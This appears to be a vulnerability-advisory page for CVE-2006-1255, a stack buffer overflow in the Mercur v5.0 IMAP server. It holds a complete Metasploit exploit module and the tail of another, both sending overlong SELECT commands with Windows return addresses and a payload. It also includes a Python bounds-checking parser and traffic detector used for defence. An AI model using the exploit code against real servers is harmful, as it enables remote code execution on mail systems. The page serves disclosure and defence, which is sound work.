		sploit	<< [target.ret].pack('V') + [0xe9, -175].pack('CV')  

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n")
	
		handler
		disconnect
	end

end
    

- Vulnerability information (F82991)

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow (PacketStormID:F82991)
2009-11-26 00:00:00
Jacopo Cervini  metasploit.com
exploit,overflow,imap
CVE-2006-1255
[Download]

Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discovering the vulnerability.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
			'Description'    => %q{
				Mercur v5.0 IMAP server is prone to a remotely exploitable 
				stack-based buffer overflow vulnerability. This issue is due 
				to a failure of the application to properly bounds check 
				user-supplied data prior to copying it to a fixed size memory buffer.
				Credit to Tim Taylor for discovering the vulnerability.
			},
			'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
					['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 17 2006'))

	end
	
	def exploit
		sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"  
		sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])   
		sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) 
		sploit << payload.encoded + rand_text_alpha_upper(453)  

		info = connect_login 
		
		if (info == true)
			print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")	
		end
		
		handler
		disconnect
	end
end
    

- Vulnerability information

23950
MERCUR Messaging IMAP Service Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in MERCUR Messaging Server IMAP service. The product fails to perform boundary checks on login and select commands resulting in a stack-based overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
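The CNNVD summary and the OSVDB description above both reduce the bug to one missing check: arguments of the LOGIN and SELECT commands were copied into a fixed-size stack buffer without a length test. The following Python is an added example, not code from the advisory, from Mercur, or from any of the exploits listed on this page. It shows the server-side bounds check that was missing (parse_imap_command rejects any over-long argument before it is used) and a detector that runs over captured client lines and flags the over-long or non-printable arguments the advisory describes. WATCHED_COMMANDS, MAX_ARG_LEN, the function names and the sample traffic are assumptions made for the example.

```python
# Added example for CVE-2006-1255; not part of the advisory or of any
# exploit on this page. WATCHED_COMMANDS, MAX_ARG_LEN and SAMPLE_LINES
# are assumptions chosen for illustration.
import re

# IMAP commands this page names as the overflow vectors (assumed watch list).
WATCHED_COMMANDS = {"LOGIN", "SELECT", "LIST", "SUBSCRIBE"}

# Real user and mailbox names stay far below this; the public exploits
# send several hundred bytes in one argument (assumed threshold).
MAX_ARG_LEN = 128

# "tag COMMAND [arguments]"; re.S so a binary argument with embedded
# newlines is still captured as one argument string.
_CMD_RE = re.compile(
    rb"^(?P<tag>\S+)[ \t]+(?P<cmd>[A-Za-z]+)(?:[ \t]+(?P<args>.*))?$", re.S
)


def _split(line: bytes):
    """Split one raw line into (tag, command, [argument bytes]), or return
    None when the line is not shaped like an IMAP command at all."""
    body = line.rstrip(b"\r\n")
    m = _CMD_RE.match(body)
    if m is None:
        return None
    cmd = m.group("cmd").decode("ascii").upper()
    raw_args = m.group("args") or b""
    # Quoted strings stay one argument; everything else splits on whitespace.
    args = re.findall(rb'"[^"]*"|\S+', raw_args)
    return m.group("tag"), cmd, args


def parse_imap_command(line: bytes, max_arg_len: int = MAX_ARG_LEN):
    """Hardened parse: every argument is length-checked before anything is
    copied out of the line, which is the check the vulnerable parser skipped.
    Returns (tag, command, [args]) or raises ValueError."""
    parts = _split(line)
    if parts is None:
        raise ValueError("malformed command line")
    tag, cmd, args = parts
    for a in args:
        if len(a) > max_arg_len:
            raise ValueError(f"{cmd} argument of {len(a)} bytes exceeds {max_arg_len}")
    return tag.decode("ascii", "replace"), cmd, [a.decode("latin-1") for a in args]


def is_accepted(line: bytes, max_arg_len: int = MAX_ARG_LEN) -> bool:
    """True when the hardened parser accepts the line, False when it rejects it."""
    try:
        parse_imap_command(line, max_arg_len)
        return True
    except ValueError:
        return False


def inspect_line(line: bytes, max_arg_len: int = MAX_ARG_LEN) -> list:
    """Detector view of one client line: a list of findings (empty = clean)."""
    findings = []
    parts = _split(line)
    if parts is None:
        if line.strip():
            findings.append("malformed command line")
        return findings
    _tag, cmd, args = parts
    if cmd in WATCHED_COMMANDS:
        longest = max((len(a) for a in args), default=0)
        if longest > max_arg_len:
            findings.append(f"{cmd} argument of {longest} bytes exceeds {max_arg_len}")
    # Mailbox and user names are printable ASCII; raw opcode bytes are not.
    if any(b < 0x20 or b > 0x7E for b in b"".join(args)):
        findings.append(f"{cmd} arguments contain non-printable bytes")
    return findings


def scan_lines(lines, max_arg_len: int = MAX_ARG_LEN):
    """Run the detector over captured client lines; returns
    [(line_index, findings)] for the lines that produced findings."""
    hits = []
    for i, line in enumerate(lines):
        findings = inspect_line(line, max_arg_len)
        if findings:
            hits.append((i, findings))
    return hits


# Constructed sample traffic: three ordinary commands, then two that carry
# the kind of over-long argument this advisory describes.
SAMPLE_LINES = [
    b"a001 LOGIN alice secret\r\n",
    b'a002 SELECT "INBOX"\r\n',
    b'a003 LIST "" *\r\n',
    b"a004 LOGIN " + b"A" * 600 + b" secret\r\n",
    b"a005 SELECT " + b"\x90" * 16 + b"C" * 300 + b"\r\n",
]

if __name__ == "__main__":
    for idx, findings in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: " + "; ".join(findings))
```

On the sample traffic the first three lines pass both the parser and the detector; the fourth is rejected for its 600-byte LOGIN argument, and the fifth is rejected and additionally flagged for non-printable bytes in the SELECT argument. The threshold is deliberately a parameter: on a server it belongs next to the buffer size it protects, while a network-side detector can afford a looser value and still catch the several-hundred-byte arguments the advisory refers to.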

- Timeline

2006-03-16 Unknown
2006-03-19 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author
